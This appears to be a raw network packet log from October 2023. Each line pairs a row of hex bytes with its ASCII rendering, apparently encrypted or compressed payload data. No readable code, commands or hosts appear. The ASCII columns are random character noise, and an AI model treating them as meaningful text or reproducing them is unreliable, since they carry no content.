                                                                                                    Data Ascii: CphBxYDx(?<5nNg2?y!ZozNC}"(b=xeLvc793Y2P= 7<#q!6L*#\g*jI}9wlI&wDNo[LP9DnbyN0_L]3*83RFT2h
                                                                                                    2023-10-24 04:55:36 UTC4682INData Raw: f3 f8 45 6f ff 55 b9 28 8a 0b d0 fa b5 07 08 e9 93 3c 44 0f 99 92 8c 43 d9 8f 8e ab 3d 08 e3 dc 7e 3a fe 68 0a b2 df b4 61 8c cc 1d af cb fc 88 f2 5b 1b 7c 16 b8 fb 3a 5b 67 d7 0f e4 dd a5 7d ff 2d e7 29 1d d4 6e ad c8 79 de b0 4c a7 8e 93 26 2f ac 4c 8f b7 3a b0 09 27 e2 be 29 09 4e 83 f0 13 b3 ce ce f5 0e 1c c8 c1 36 ce 94 ac f5 0d 3b 75 49 a3 39 06 ac d5 21 7f 63 41 8e 14 4e 9f 86 c7 2f a8 41 a7 89 f9 19 31 68 3d 52 a8 2b 71 62 c4 76 8c d6 26 3a 94 18 aa ea a7 0a 60 3a a7 46 0c 61 7b 8d 3e 18 1f 2d b2 55 d0 98 f0 05 cc 3d 1d 1e 65 3f 37 3b 98 9a b8 02 2b 1b 55 54 85 30 bd 01 a6 a5 8c 67 88 9d 23 cc 10 af fa da e1 a9 0f 4a 1e 82 ff 80 89 34 03 e6 46 9f c4 98 5b 5b 45 6c 20 47 9f 0f 08 20 ab 36 b3 03 89 35 70 99 fe 16 8b 69 81 c5 a2 76 bf fc e9 21 88 8c
                                                                                                    Data Ascii: EoU(<DC=~:ha[|:[g}-)nyL&/L:')N6;uI9!cAN/A1h=R+qbv&:`:Fa{>-U=e?7;+UT0g#J4F[[El G 65piv!
                                                                                                    2023-10-24 04:55:36 UTC4690INData Raw: 1a bb 61 3f 76 f8 b6 c1 a7 7d da 37 b6 be 86 7b 6c 16 ef 67 6b b1 3c d0 32 18 12 23 11 ac 7d 7b f3 dd 74 f7 19 68 f7 1d 47 b6 34 71 9c 7b c0 94 74 fd 08 fa 7a 30 52 66 32 66 98 31 f9 07 a9 79 aa cb 00 15 65 23 f0 4e e7 9f 0e fe 9e 2e 29 90 7a 76 f3 e5 a6 47 57 67 e4 0d ff 00 ca c1 e9 1c 73 98 df d4 5e 48 b8 32 b9 cd fb 87 df 76 c1 79 47 bd d9 7c 2e ec 12 09 b9 39 c0 eb d2 0b 41 b9 81 5d ba a1 0b 13 51 9a f8 9c 44 f9 4b bd 54 62 b4 41 f5 4a 9b 0a 4c 68 23 52 dd 3c 5a 4d 50 dd cd 49 9c d1 1c d1 5b 5f e9 85 e3 c6 65 78 34 d7 1d 00 84 38 6a 74 5c c6 6e 74 36 7f 1a 19 05 59 7e 07 13 85 1b 5f 15 e3 0c 12 46 dd 12 27 e3 c9 af 20 53 5d 93 02 3f 4f 1f dd bd 2f 57 a9 fd 8a 2a e0 61 69 f9 c4 8e 8d 51 3b 91 88 43 4d c6 cc 44 21 fd 03 1a ef 38 b9 ae c9 f4 d3 a2 bc cc
                                                                                                    Data Ascii: a?v}7{lgk<2#}{thG4q{tz0Rf2f1ye#N.)zvGWgs^H2vyG|.9A]QDKTbAJLh#R<ZMPI[_ex48jt\nt6Y~_F' S]?O/W*aiQ;CMD!8
                                                                                                    2023-10-24 04:55:36 UTC4698INData Raw: 32 59 85 fd a8 cf 3d a9 65 77 da ab 1c 70 e5 5d f9 bc ce 2e 3f 62 cd 1c 46 b8 80 44 91 c9 fc d0 ab c3 c6 a5 0f 1d 8a b0 df a1 45 9c 3c e1 fa 34 39 26 29 8f 02 ea f9 34 87 69 85 05 4c d0 80 b6 45 6c 45 ee 71 b3 15 59 c9 82 5e a6 0a 76 1a 5b ba 1d b4 ff 90 32 c1 69 0d 51 c7 ab da 6f 32 f2 42 fe 8f 52 16 62 08 30 95 bf bf 92 08 f3 b1 a7 3b a0 86 cb e6 87 79 e3 c9 5d ab 3c c4 38 bf ed 0b 96 b8 c2 14 2b 6d 81 68 8f 2d 21 7d cc 60 df 0a 98 3e 51 8a 9f bb f8 b1 13 ff 38 df 19 3b c7 29 fc 1e 34 07 14 62 f7 1a f5 b8 ab 1d 21 1f 35 ca 37 77 2d 88 37 28 f7 cd 49 c7 4e 5d 26 67 44 86 85 13 c5 05 4f 48 55 50 f8 c0 a4 52 68 cb 0b b6 2b 52 02 90 2c 17 54 a0 9f 72 ae 37 d5 df 7b f2 26 bc 16 92 44 a3 96 d4 c1 e5 9d 43 85 84 b8 e2 92 3e 17 bc f9 3f ff a4 31 77 76 b1 62 5b
                                                                                                    Data Ascii: 2Y=ewp].?bFDE<49&)4iLElEqY^v[2iQo2BRb0;y]<8+mh-!}`>Q8;)4b!57w-7(IN]&gDOHUPRh+R,Tr7{&DC>?1wvb[
                                                                                                    2023-10-24 04:55:36 UTC4705INData Raw: 28 3b ac df 7a 87 87 bc d1 79 3b a6 48 10 a1 2b f0 f3 54 67 76 ff 88 1d ff e9 20 95 97 ad 48 df 3d 43 75 d9 57 e1 59 fa 05 61 1c 12 b3 b5 0b 75 54 a3 cb 30 a9 53 fa 38 ab b8 98 bf 31 09 4f 6f 26 25 31 66 05 f6 60 ea 52 56 65 d0 b1 c4 17 75 99 13 1a 1b 4e 04 49 1d 6a 26 98 c3 84 bf 9e 14 c4 f9 80 19 c1 fe 2f 51 1d 5a 39 4d c0 8f 09 6a 8f 27 f1 3f d6 21 51 23 ee e0 79 74 42 a4 a1 35 3e 1d 47 70 09 9f 36 05 c5 3f a8 2d 82 48 b5 2b 5a cd 2c 48 39 98 db 8b 66 c2 61 f4 43 35 e7 72 f0 27 6f 11 72 a0 4b 48 a6 7d 5e 89 23 9b 43 b6 9d 78 54 f1 a1 9a 52 88 5f 82 d4 b7 ff 70 49 7d 9a f0 6b 38 34 12 39 11 7c a3 9d 13 2b 23 ef 35 64 b7 d1 9c 72 2a c2 f9 74 df 95 d5 a8 a1 b6 24 0d 80 73 6c 6b 9b ec 76 c4 65 7a d4 6f 32 19 22 58 e1 d6 fb f5 53 79 1a a2 42 cf 71 41 f4 73
                                                                                                    Data Ascii: (;zy;H+Tgv H=CuWYauT0S81Oo&%1f`RVeuNIj&/QZ9Mj'?!Q#ytB5>Gp6?-H+Z,H9faC5r'orKH}^#CxTR_pI}k849|+#5dr*t$slkvezo2"XSyBqAs
                                                                                                    2023-10-24 04:55:36 UTC4713INData Raw: c6 e7 44 6d 98 20 9e 2b 73 95 e9 72 ce 03 e6 12 a7 53 65 6e 89 c5 ae c0 26 a4 c0 ca d2 35 9a 60 89 20 4e 31 d9 76 1a 4b a1 1e b2 54 49 44 8e 8c 57 c2 a5 52 9f 98 d6 80 1e 40 19 10 40 83 84 ec 13 6a 5a f2 20 0e 3f a6 ba da 56 3b a6 eb db ac d0 db 94 cd 99 ea 07 6c 42 a1 84 f7 a5 9f 42 23 30 c5 b0 ec f7 88 90 ee 2a 72 16 4f 86 7f 4b d7 8c 85 42 89 2f de 21 a6 65 cd 72 d8 f1 d5 50 ee b8 bf 6e 6e 80 90 4f 9d bb 0d 75 df 9e e6 ce 55 72 50 02 ec 1e 7a 16 09 91 ad b0 c8 99 0b e5 d5 ae 14 69 1e 90 4c 57 11 30 eb 97 1e 4b 74 af 20 1a f9 af 33 5a 20 d8 0d e6 f4 3e 1d c8 8e 97 33 f1 c8 05 d9 fd bb 8e 16 e6 55 1b 01 7f 22 40 74 4a 2e e7 a1 a6 42 e8 a9 cc 5e 54 f4 8a 96 5e fc 4e 7f e9 95 77 61 73 c5 17 4c b5 25 5e a4 43 be 4c 4c fd 9a 35 47 cb fa 86 9f 42 9d 2f 5d 44
                                                                                                    Data Ascii: Dm +srSen&5` N1vKTIDWR@@jZ ?V;lBB#0*rOKB/!erPnnOuUrPziLW0Kt 3Z >3U"@tJ.B^T^NwasL%^CLL5GB/]D
                                                                                                    2023-10-24 04:55:36 UTC4721INData Raw: 2d 92 80 d5 33 7a a4 9d ab e8 ce ae ba bd 56 b8 c0 cd a2 56 5d 19 ed eb 44 27 d2 51 0f 11 5c 79 ef 95 a5 4d 47 cc ba ad 2d a9 e1 ed d5 dd 02 50 b4 22 b1 e8 cf f9 2a 27 a2 4e 08 97 7c c7 2c fa dd a6 58 12 10 f8 62 8e c5 54 29 ba 92 13 55 50 0c f9 bd a8 42 8b ae 2d 0c 09 99 10 a0 8f 35 47 43 78 f7 cf 74 92 e6 51 ef ee 4c 1a 43 c1 47 2e 50 ab 31 9c 21 47 25 04 eb 65 ee 92 fc 70 b4 c4 29 7a 4b 19 7a 1b 98 a8 18 e9 82 6f 1c 7a 0b b0 54 98 e5 7d 12 de 64 fc 87 90 7d bb 90 42 fb 4e 61 47 bd d4 d4 b5 ed bb 41 f8 eb 6f ce 84 53 94 f7 08 c7 01 9a cc 5c 9a c5 94 82 86 9e 85 b4 ec 3b aa 9b b9 59 73 d2 4d 2f ce 84 1a ad ad bc 92 41 ea 6e a4 0a 9c 97 9b 3c 6d 16 c8 5d a9 0a d6 3a 47 9f 05 53 32 cc 8c 00 f4 c9 fe 84 d0 12 e5 f6 e2 34 1f b2 ef b9 ad f0 08 86 57 80 83 1f
                                                                                                    Data Ascii: -3zVV]D'Q\yMG-P"*'N|,XbT)UPB-5GCxtQLCG.P1!G%ep)zKzozT}d}BNaGAoS\;YsM/An<m]:GS24W
                                                                                                    2023-10-24 04:55:36 UTC4729INData Raw: 7d 83 c1 01 42 d0 a5 6f 2c bd cc 96 5f 82 56 6f fa 80 9f 87 2f b2 f9 ba 11 44 a9 ec 62 c6 99 75 64 b4 3f cf 69 1f 78 20 6d 6c f3 46 ce ac dc 9f 46 74 76 9e 53 21 0a 38 ae 7d 35 33 94 1e c2 29 d4 a6 50 b4 f8 33 3f 0d ce c8 8e 8a 5e 56 d7 9b 82 4d 87 33 01 6b 79 a4 1b d7 6c be 37 7b a8 11 13 f1 58 ee 73 b2 59 6e d4 50 42 8a 02 fc c9 e9 d0 c5 29 47 4e 3c 07 49 a2 dd 87 85 df b7 ed dd c8 1a 0c b0 b9 75 11 50 90 98 f0 16 85 84 63 c9 85 4d 95 a2 59 3a 59 21 18 72 ea f5 b9 89 08 7c 5a 29 69 1f 92 71 ba ff a6 cf ab 56 80 76 64 b3 f6 62 7f a1 b0 22 6c 55 78 1c 1c aa cb ea f8 ed 51 3d e3 f8 68 f8 49 14 44 40 42 4a 76 2f 14 8c 5f 57 ef 38 43 16 1f f5 9f 87 e0 4a bc f0 76 f9 61 c5 c9 94 5c 6a 88 e5 87 5b fd 71 4a ba 6f 12 0f 9b db 48 30 87 8e df f1 4f a8 d4 59 fe f6
                                                                                                    Data Ascii: }Bo,_Vo/Dbud?ix mlFFtvS!8}53)P3?^VM3kyl7{XsYnPB)GN<IuPcMY:Y!r|Z)iqVvdb"lUxQ=hID@BJv/_W8CJva\j[qJoH0OY
                                                                                                    2023-10-24 04:55:36 UTC4737INData Raw: b5 3b 1f 1c 87 b3 9a 2a 43 06 7d 34 e6 00 84 ed c2 4d c7 63 4f dd 97 57 0a 01 78 fc 01 cb c5 b0 82 50 db ea 09 73 7f 16 44 a1 6e e6 b8 63 ad 1e ab 7e 1b 7a d1 47 8f 07 24 b4 45 01 60 cc c6 b2 5c 06 15 97 ae 52 75 0a 32 55 33 3f 60 c0 1d 42 97 0a 0a 63 55 06 d7 7d ed d2 eb c8 e4 52 72 0b e4 bd 1c 0b 4f 8e 83 72 4f a5 e6 b4 0d 3d 5a a5 1e 12 da 2f 55 1b 3e df 3a 90 57 72 90 cd 4c 7c a5 42 60 32 b7 5e fa 50 c3 4f 5e 9a cf 43 e7 23 32 cb 55 f2 7f 16 4c a1 a0 a4 30 fa 80 49 30 f3 fc a3 59 4d 1b 3a 44 47 a2 4b 02 8d 1d 83 2b 4b cb db c3 ef b7 a3 89 bd 4b 06 e8 4c 53 07 a0 1a b1 36 ac 1a f2 19 15 d2 5c b8 3f 4a 92 26 cd 73 90 2e 0d ac 35 de 53 c7 cd 85 fa 02 fb f9 97 7f 50 e9 48 ad 67 7a 8d 67 b7 88 5c d6 a6 5e 81 f9 92 c5 a9 07 8e 53 fa 03 d6 0d d0 ba 40 4e 8e
                                                                                                    Data Ascii: ;*C}4McOWxPsDnc~zG$E`\Ru2U3?`BcU}RrOrO=Z/U>:WrL|B`2^PO^C#2UL0I0YM:DGK+KKLS6\?J&s.5SPHgzg\^S@N
                                                                                                    2023-10-24 04:55:36 UTC4744INData Raw: 5b 25 72 75 31 f1 6c ef e0 a6 d7 d2 df 4b d5 1d 50 74 9f 45 74 10 91 61 08 07 4e 2d ff c5 b4 b3 d9 fd a0 a0 e8 64 bc 05 7c a8 86 fb a8 55 65 c7 bd 05 86 88 73 c0 9b 7d 3b b3 fb e9 3e 68 63 8f c8 81 5a b0 89 5c 71 41 f7 20 4c 17 86 39 75 5b 26 c4 3b 53 88 9f 72 7e 1d 79 eb e5 01 94 ae e4 b2 81 52 21 5e f2 da c6 03 51 d5 37 03 e8 d9 0c c9 fe 11 6a f4 ef e5 cd 02 04 df 51 7f fc a9 48 47 67 09 27 bf a2 49 f9 b9 26 3d ab 1d 36 81 6c bd 09 c0 b0 b9 b9 63 87 de 45 02 ac 24 77 5c 3c 4a 24 4b 6d f6 30 38 a2 52 99 bc 42 15 fe 43 26 a9 bb f8 78 ad 7c 43 d4 bc 6c 80 2f b1 4c 1d b3 2d f4 28 0d bd 1f 34 77 9f 61 14 9a 94 cf e1 4e 57 32 7d ba be 54 aa db f5 f5 53 a4 28 cd 5f b6 db ff 1e 7b 59 a7 93 85 cc 7a be b5 09 54 97 a2 a0 4b b9 24 4d ef 34 63 23 ad a6 55 d9 cb d8
                                                                                                    Data Ascii: [%ru1lKPtEtaN-d|Ues};>hcZ\qA L9u[&;Sr~yR!^Q7jQHGg'I&=6lcE$w\<J$Km08RBC&x|Cl/L-(4waNW2}TS(_{YzTK$M4c#U
                                                                                                    2023-10-24 04:55:36 UTC4752INData Raw: 19 c6 5d 89 d0 33 db 33 3b 46 9e 14 d1 cd 11 4e da e9 8e e6 b9 b7 ff 14 e5 1c eb 97 8e 30 67 7a ec bc 3d 47 70 54 84 29 13 8e 6a 7e 16 7b 99 46 54 37 b9 8a 22 a4 64 1c 54 13 fa b8 a3 eb 7f 0a f5 f5 4c 56 18 e7 36 36 68 1e c6 7b c8 11 ed af 39 92 f5 0d 96 b3 34 cb 23 f6 0c aa 62 58 b8 83 5a d1 67 ec e3 3f a5 d6 99 14 35 27 85 6d 6b 0b eb e8 3a eb 68 e9 7d ca c9 15 42 9a 9b 2d 9e 92 e4 9c ce 61 b8 7c 25 91 ee de 33 57 c1 1b 19 9b 9e ac 0a 6d ad 61 fb c1 43 70 16 ef 7f 9d 45 1d 55 33 04 c1 19 c7 1e fe 23 2d c6 10 6f 1d 81 56 9c 9c 9d e8 1f 7d 73 25 51 39 e8 5d 2a 38 a1 ab 5e 28 eb 0f f1 4e 94 f1 25 65 a9 d5 09 92 2b c3 a9 77 1d ec 6d 41 bc 3c b7 6b ea 19 94 ac 31 24 24 74 80 e4 f9 80 a7 bc 70 9c 5d 1f 4b 5b 3f da 0d ba 62 26 c3 5c ec fb 82 46 ed 01 a3 2d 65
                                                                                                    Data Ascii: ]33;FN0gz=GpT)j~{FT7"dTLV66h{94#bXZg?5'mk:h}B-a|%3WmaCpEU3#-oV}s%Q9]*8^(N%e+wmA<k1$$tp]K[?b&\F-e
                                                                                                    2023-10-24 04:55:36 UTC4760INData Raw: 3a 3f 1f b5 12 7d 3c 18 b0 bc 56 08 c9 7f 5e 8c d0 39 77 6e 64 36 30 29 2e ec 41 0a af 81 33 42 19 bb 77 80 8e ec 3f 9e e3 0b 34 e2 0d 2c 6c ec 3e 18 d6 fc 00 e2 59 92 0e a6 3c 91 06 d6 5c f6 1f 8b 24 96 ab 9e 02 f0 c1 6f c1 43 a2 71 43 ed d5 3b 19 9d db 69 d9 1a ba 26 ab c5 82 d6 59 05 17 18 17 7f bb cf cf 64 72 a4 82 48 95 e2 9f da 9d 21 7b 7e f0 a1 65 1c 11 72 2a 7f 7e da 9d 62 3a 57 b3 f7 40 12 3b 5d 82 29 06 12 73 4c 10 58 20 d6 91 8f 90 11 11 71 ee 73 dc 3a 32 10 f1 aa 8b eb 89 e8 fc 97 18 84 50 b2 88 72 2e 0c 17 78 17 f3 a3 63 12 a6 e6 e8 24 01 a5 30 5c a5 51 a9 e0 c0 dd d6 8b 1d 77 1d 89 e6 be da dd ca 93 04 e0 fd 7a c3 9c fa c0 4d 8b 4e 6d 04 f1 30 2c 65 57 04 25 72 42 36 85 b6 41 f8 6d c3 bf 5e 54 ee f9 71 cc 6a 2e e5 94 ad 6c d5 ea 8e 86 0f cb
                                                                                                    Data Ascii: :?}<V^9wnd60).A3Bw?4,l>Y<\$oCqC;i&YdrH!{~er*~b:W@;])sLX qs:2Pr.xc$0\QwzMNm0,eW%rB6Am^Tqj.l
                                                                                                    2023-10-24 04:55:36 UTC4768INData Raw: cf 0e 6f b9 1f c6 57 20 96 5e 4c 77 d3 8b 3f 52 8d 2c e7 4c ed 25 7f b5 8b d8 9a c7 ac 4a f5 91 a7 0a 41 72 aa bb 47 f1 a2 78 a0 f4 31 50 e4 0d c1 99 94 21 7b 6f 11 4f 6a 2e 8f c2 63 0e 4d a2 7a d4 0c d2 bb 05 bd 03 55 d9 12 4f e9 4f b7 7a 4b ff 48 4f 95 03 28 14 da 64 f2 c1 a0 74 e9 15 32 0f c4 44 01 5e e5 96 c6 0f 2c 3d 41 0b 47 48 88 91 4c c8 63 1e 5f 49 3a 0b 26 55 13 54 9b fa 2d 50 fb 24 4d f9 29 07 5d 96 bf 49 f4 90 7f c1 f9 5c 22 a0 d2 01 a7 de 3b b5 b5 eb 99 3a 64 18 a6 26 ec ba ca f8 e8 d4 d9 7e f3 e3 26 20 b7 dc 76 d3 55 e7 02 84 dc 00 81 2e 0d cd 7f 71 27 36 5d 91 46 71 1c 6b 4f d4 aa 58 7a f6 83 4f 5a 8a 02 8e 60 9a 09 cc 4d 64 52 d9 1a ff e5 4a 4e cb 95 6e 4a 09 08 e5 01 6d 79 cf 2b 92 47 ee 2f 1b ef 0e c9 30 a0 54 b3 29 83 61 d1 90 78 27 fb
                                                                                                    Data Ascii: oW ^Lw?R,L%JArGx1P!{oOj.cMzUOOzKHO(dt2D^,=AGHLc_I:&UT-P$M)]I\";:d&~& vU.q'6]FqkOXzOZ`MdRJNnJmy+G/0T)ax'
                                                                                                    2023-10-24 04:55:36 UTC4776INData Raw: 58 19 e7 79 3b 2f cb 80 77 e2 dc 2a ae 11 77 5c c7 73 8a e6 f9 88 52 b8 e0 90 1f 68 3d d4 c4 df 61 57 93 d9 d8 e9 ef 24 27 5a ee 2e f5 33 82 e1 80 91 73 99 ba 87 c7 43 11 80 c7 82 ed ad a2 91 59 31 6e 47 2c 0e 20 e8 d9 dd 50 11 0e 11 ff 06 bd 71 3b 19 61 c2 99 8b c3 d2 38 28 06 67 05 ac 94 70 3b 49 1c 0d 21 1c b2 03 88 6e e1 1c ff e5 2b e0 05 b1 ca c2 1d d5 8f 99 d4 33 72 56 c2 23 b6 3b 89 7d ea d2 fe 6c ab d3 15 be 2c ef 21 b9 86 26 92 85 90 10 b6 1d 05 88 04 0b 62 20 75 50 37 a4 82 e9 f5 1f 34 84 44 ec 20 47 e5 3a b5 fd 47 0f 01 49 fa 03 3b 65 f4 d4 21 c9 77 4a 4b 70 f9 20 ab 1f bc ea 57 a1 20 73 6a ac 4f 7d a6 d7 73 ac ba fb 86 0f 9c 15 1e af a4 f8 ac 14 5a 9d 9b 2e 96 7e a3 5d 36 dd 03 0f 24 57 60 7f f8 0b 29 23 9c 21 19 9b c0 0a 1b 6e f5 1d a9 5d 38
                                                                                                    Data Ascii: Xy;/w*w\sRh=aW$'Z.3sCY1nG, Pq;a8(gp;I!n+3rV#;}l,!&b uP74D G:GI;e!wJKp W sjO}sZ.~]6$W`)#!n]8
                                                                                                    2023-10-24 04:55:36 UTC4784INData Raw: 25 c4 a7 a5 b6 6d f9 28 39 15 55 ea 05 f1 ad 51 aa eb c8 66 38 d5 bf 2e ac 35 0c 83 32 54 51 26 a1 79 d7 10 4a 4d f6 ab d3 1b 6f 1f df a9 a9 67 a5 83 04 ce 9e 50 d2 aa 1d 75 2e 1f 20 ce e6 38 99 a8 a3 df b4 28 ee 31 77 d7 7c a5 2f c6 82 07 48 a2 28 11 06 42 3b 36 e6 fd 9d 6f 0c 02 9f 72 54 09 1b 4e b3 ff ff 3b 15 14 61 38 ab df 6d 1d 4d 78 1c f8 d5 c9 a8 c4 ec 48 ab d5 ff b0 27 55 40 d0 a3 11 aa be e7 42 09 cf ac d8 b7 04 e5 68 35 71 49 13 73 10 83 75 27 7d 60 3b 85 56 48 fb 98 83 98 69 e0 09 2a 65 b1 1c 15 2c d6 2b 09 08 56 03 da b7 91 1c da a4 6e 6d 7c 0d d9 53 29 b2 7c a8 fe ef fd fd e3 9a fa 23 be b6 b8 f9 24 87 42 88 98 2d 45 a2 60 d1 3e c7 29 b6 bc 90 b0 28 1c 1b 15 9e 07 2b 20 d2 fc 6f 0d 51 0b de f8 8b 75 0d f6 24 8b 15 21 c6 2a ba 84 b2 2e 4d ac
                                                                                                    Data Ascii: %m(9UQf8.52TQ&yJMogPu. 8(1w|/H(B;6orTN;a8mMxH'U@Bh5qIsu'}`;VHi*e,+Vnm|S)|#$B-E`>)(+ oQu$!*.M
                                                                                                    2023-10-24 04:55:36 UTC4791INData Raw: e6 c5 6d 82 1e 7e 8c e4 75 0e d2 36 33 36 e4 72 8e 1d d9 12 e0 ee 55 c7 f6 83 cc f6 21 4b 49 a7 b0 68 7f f7 0b db c8 17 3c 14 09 90 d2 f1 82 e9 01 1e 1d ac 67 cd 4d 57 fa 61 da 19 83 7c 0f 29 64 aa 85 af cb 75 56 5b 2c 8a 28 d3 8f 18 8f a0 f4 50 ad cb 97 0c 26 5e c8 d0 90 5e 2f f2 c8 13 80 57 8c 0f 5e 55 a7 8b 5a a7 5a f5 62 3e eb 63 c2 f2 d3 e9 03 44 83 c9 f1 9f e2 7f 54 d6 30 69 8b 49 b6 58 70 e1 24 d2 d9 33 7f 79 a1 39 5a 7b c4 e1 6a 26 14 ab 2d 6a dc d4 5c b3 a6 6c 77 e5 5d cc 62 da 9e 9c b9 02 05 2c df c2 3d 25 19 1b b4 ec c1 ad 7c 63 9c 08 ff d2 f0 f2 85 73 34 e6 b9 e3 d5 95 5f ba 16 54 cd 79 5c 81 e4 83 75 31 67 d4 00 af 6d 2c 77 f6 54 fb 03 2b f4 66 cd ae 42 3f 87 72 8e 26 ff 18 83 63 fb ea 83 7b 61 dc e6 4e 43 59 df 44 ee eb cb 98 2d a0 78 30 2c
                                                                                                    Data Ascii: m~u636rU!KIh<gMWa|)duV[,(P&^^/W^UZZb>cDT0iIXp$3y9Z{j&-j\lw]b,=%|cs4_Ty\u1gm,wT+fB?r&c{aNCYD-x0,
                                                                                                    2023-10-24 04:55:36 UTC4799INData Raw: 0b 58 21 62 03 f0 c9 7f 86 6d 3a 0d 70 89 23 43 bd 99 c7 e6 55 b6 30 ff 2f 42 a4 ae 09 60 97 ec 25 99 6d 9d 36 36 73 30 f3 c6 a0 b4 46 8b 36 da e9 06 f6 f3 92 9a 6d 57 78 61 f5 48 1b b4 1a dc bf 5f 2c 5b 59 63 13 43 60 7d be 1d 94 4b ae 54 bf cd 3e c2 81 9e d4 67 be ce 53 f9 e0 19 8e 17 ca 4d ee 67 3c 74 d8 da 70 2c 8e cb e6 11 0d be 81 b7 81 6d 36 0e 0c 48 7d 72 be b4 89 36 d2 c3 89 9f 9d f8 c4 2d 4a e3 34 8f 10 36 06 6f 08 e9 34 2c 3e a0 fa 2a a7 6d c0 d2 4c ae 00 d2 1c 8a 50 31 a3 2e 68 55 f4 65 36 95 0f 3f c6 64 20 e0 c3 05 2f 5a 77 07 a1 ee 48 f9 5a 35 42 a4 60 d3 2a d8 a2 b1 5b 06 2a df 4b 52 28 1a 08 9d 10 57 0c b1 15 b2 21 fe 0c 9e fb ac 25 a7 40 77 d3 dd 23 5e 27 e4 bf 75 8f 6e f1 ad d4 98 84 06 0a 43 cb 46 0e 0f ae 17 db 74 ec e7 f1 f8 c7 c6 48
                                                                                                    Data Ascii: X!bm:p#CU0/B`%m66s0F6mWxaH_,[YcC`}KT>gSMg<tp,m6H}r6-J46o4,>*mLP1.hUe6?d /ZwHZ5B`*[*KR(W!%@w#^'unCFtH
                                                                                                    2023-10-24 04:55:36 UTC4807INData Raw: d1 c3 6a 70 70 ad 2a 7a 41 16 df 0f 8b d9 92 b4 3e 54 d4 fd 21 32 62 70 3e 80 66 d2 da a8 31 2f 02 2b 44 39 98 08 bf 92 d8 e6 2f 38 cb eb f4 2b 10 f8 39 30 22 d0 24 4c c1 19 73 82 af bc 17 35 2f f7 14 a6 86 f3 43 3b 61 bf 2b 21 a2 44 ca 01 63 72 fd 49 e4 4d 23 d1 21 b0 23 ef f1 6f 24 ff 7d 90 39 ca d7 39 31 b3 70 98 35 48 7d 5c bd 88 47 d5 22 8a a1 9e 14 51 6f b6 2a b8 ef 9f a8 f1 55 8a aa 15 b8 45 5a 1a 3d e5 62 a0 2e 43 9d b8 45 12 e6 77 f5 2a bc 68 fc c7 0e 82 5d 1a 66 a9 b7 21 42 ff c9 d4 64 e3 0f 3d c0 f7 4e c0 00 2d fa b4 1f 21 29 21 a0 a3 55 8d 71 8c c8 aa e0 b9 c8 1f 00 22 7e 9a 62 0e cc 33 94 98 f2 8b 70 85 e4 a7 31 5c 23 b0 8b 2f 72 db 2a 40 83 f4 70 e1 1b 30 a4 ca 62 b7 75 6e a4 bf 0c 78 1f b2 9d 14 f3 0f d9 f9 32 6a a3 26 2d 61 06 f5 b1 77 f0
                                                                                                    Data Ascii: jpp*zA>T!2bp>f1/+D9/8+90"$Ls5/C;a+!DcrIM#!#o$}991p5H}\G"Qo*UEZ=b.CEw*h]f!Bd=N-!)!Uq"~b3p1\#/r*@p0bunx2j&-aw
                                                                                                    2023-10-24 04:55:36 UTC4815INData Raw: b7 22 66 bd b6 37 c0 3b e9 75 be 09 3f 19 00 bd 2d 7a a9 04 b1 4f 23 7d 38 97 02 a5 79 b1 df 77 70 de 3c e3 3c 22 28 99 8e 1f 5c 69 bd 37 95 03 7c 29 0c f1 ec a5 00 2d 2b 1a 31 ae ae ce b3 b1 fd 7d c5 f0 a5 91 e2 fd d2 70 63 fc 88 19 ef 81 1c f2 84 16 de 78 9f 64 a1 b0 0c 4c d7 cb 21 c0 63 23 95 ab 71 cd d7 ac d2 bc b4 48 32 71 6a 8a f8 87 36 dc 44 f0 e8 1b 01 bc 3b f0 35 2d a4 26 e0 90 1b ef b8 f4 05 ea 3b ac 72 28 ad 71 c0 4e e2 91 0c 42 a8 bf 6c eb 09 fc bf 60 69 47 97 d6 9d 33 38 ab d7 88 f8 f5 b3 46 8d f6 67 0a 6f bc d0 fd 36 a9 55 4f 8f 8f 7d b5 1b 54 de cd b8 c4 4f 33 4b 61 d3 ca cd de 50 ba eb c4 6e c4 b6 0b 8d ef fa ca 8a 10 c8 79 20 a6 e2 58 f1 0d 02 20 f0 5d 29 c2 69 7c 4b cb a5 05 c8 78 5f 1f de 29 ed 1e e5 07 b7 21 a4 9a dd 05 05 a3 06 f9 ce
                                                                                                    Data Ascii: "f7;u?-zO#}8ywp<<"(\i7|)-+1}pcxdL!c#qH2qj6D;5-&;r(qNBl`iG38Fgo6UO}TO3KaPny X ])i|Kx_)!
                                                                                                    2023-10-24 04:55:36 UTC4823INData Raw: ba aa 90 fb d5 ab 96 2e e9 88 dd 8d 0a b5 6b 2a 71 06 ac 1d 7b 04 05 78 ca ed af e3 ba e9 24 ee a1 66 7e a4 12 f6 67 9e b8 19 59 f0 4e 8a eb 42 cf c0 aa 6c c7 c2 00 c2 b4 9c 75 82 32 55 57 e7 0b 5e 03 d5 d3 1a 7f e5 b0 46 4c 66 db f7 19 8b 98 85 97 41 98 d8 08 29 1b e9 eb f0 26 97 aa 11 02 07 21 dd 8b 8d f9 d7 dd 24 23 97 5b d8 a4 94 7d 58 47 53 37 14 51 cd 82 69 b3 ea 54 09 cf 86 00 4c 36 9e c1 8f 97 0e b1 86 d6 93 68 f3 c1 bf 11 eb 27 ff 48 df 95 f0 20 b9 4e 1a 3a 5f 8d 79 e8 4b 9e 0b f3 39 c5 df 6f b7 f5 ea e8 7d e5 49 1c 14 c3 4e 6e 79 4e 6c 3b 74 8e 72 41 d7 f9 25 74 53 97 d3 14 90 63 64 5d c1 29 e2 3b a1 de da e5 b9 ce 5c e0 cb 20 cd 11 43 33 47 9e 9f c5 7f f6 87 12 2f 01 7a 9c 31 74 35 95 a1 36 cf c4 11 44 f5 ef 96 97 d0 72 87 45 bf 67 26 64 e2 d7
                                                                                                    Data Ascii: .k*q{x$f~gYNBlu2UW^FLfA)&!$#[}XGS7QiTL6h'H N:_yK9o}INnyNl;trA%tScd]);\ C3G/z1t56DrEg&d
